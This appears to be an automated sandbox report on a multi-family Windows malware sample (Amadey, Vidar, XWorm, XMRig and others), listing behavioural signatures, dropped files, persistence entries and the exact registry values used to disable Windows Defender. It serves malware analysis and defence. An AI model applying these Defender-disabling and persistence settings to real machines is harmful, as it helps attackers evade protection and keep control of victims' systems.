Malware Analysis Report

2025-04-03 09:16

Sample ID 250305-2xzx1ask15
Target f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e
SHA256 f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e
Tags
amadey healer litehttp systembc vidar xworm 092155 ir7am bot credential_access defense_evasion discovery dropper evasion execution persistence rat spyware stealer trojan xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e

Threat Level: Known bad

The file f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e was found to be: Known bad.

Malicious Activity Summary

amadey healer litehttp systembc vidar xworm 092155 ir7am bot credential_access defense_evasion discovery dropper evasion execution persistence rat spyware stealer trojan xmrig miner

Systembc family

Modifies Windows Defender notification settings

Amadey

Litehttp family

Modifies Windows Defender TamperProtection settings

Detect Xworm Payload

Modifies Windows Defender DisableAntiSpyware settings

Vidar

Xworm family

Modifies Windows Defender Real-time Protection settings

Vidar family

Xmrig family

SystemBC

Xworm

Detects Healer an antivirus disabler dropper

Healer

LiteHTTP

Amadey family

Detect Vidar Stealer

xmrig

Healer family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

XMRig Miner payload

Downloads MZ/PE file

Boot or Logon Autostart Execution: Active Setup

Blocklisted process makes network request

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Drops startup file

Windows security modification

Checks computer location settings

Identifies Wine through registry keys

Loads dropped DLL

Checks BIOS information in registry

Unsecured Credentials: Credentials In Files

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Reads data files stored by FTP clients

.NET Reactor proctector

Executes dropped EXE

Enumerates connected drives

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Browser Information Discovery

Program crash

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious use of UnmapMainImage

Suspicious use of SetWindowsHookEx

Modifies registry class

Kills process with taskkill

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-03-05 22:58

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 22:58

Reported

2025-03-05 23:00

Platform

win7-20240903-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Xworm

trojan rat xworm

Xworm family

xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\kplnh\nvwjc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\kplnh\nvwjc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\kplnh\nvwjc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe N/A
N/A N/A C:\ProgramData\kplnh\nvwjc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\ProgramData\kplnh\nvwjc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\2b862aa467.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\2b862aa467.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\8a07a872cb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\8a07a872cb.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\3bb952ccb1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107740101\\3bb952ccb1.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\QanWmXjd\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a2d999341a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\a2d999341a.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
